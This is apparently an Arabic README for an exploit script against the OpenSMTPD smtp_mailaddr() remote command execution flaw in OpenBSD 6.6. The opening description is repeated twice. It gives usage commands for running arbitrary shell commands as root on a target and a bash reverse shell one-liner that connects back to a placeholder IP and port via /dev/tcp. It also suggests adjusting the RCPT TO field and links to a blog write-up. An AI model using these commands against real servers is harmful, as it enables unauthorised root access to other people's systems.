
يوجد هذا الثغرة الأمنية في دالة “smtp_mailaddr()” الخاصة بخادم البريد OpenSMTPD في OpenBSD، وتؤثر على الإصدار 6.6 من OpenBSD. يسمح هذا للمهاجم بتنفيذ أوامر شل عشوائية مثل “sleep 66” كمستخدم root.
هذه الثغرة موجودة في دالة "smtp_mailaddr()" في خادم البريد OpenSMTPD التابع لنظام OpenBSD، وتؤثر على الإصدار 6.6 من OpenBSD. تسمح هذه الثغرة للمهاجم بتنفيذ أوامر شل عشوائية مثل "sleep 66" كمستخدم root.
python3 getShell.py <targetIp> <targetPort> <command>
إذا احتجت إلى شل عكسي، فقم بتشغيله هكذا
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
قم بتغيير بعض الأشياء في هذا الإكسبلويت مثل RCPT TO وشيء آخر (إذا لزم الأمر)
اطلع على هذه المقالة للحصول على شرح أوضح
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/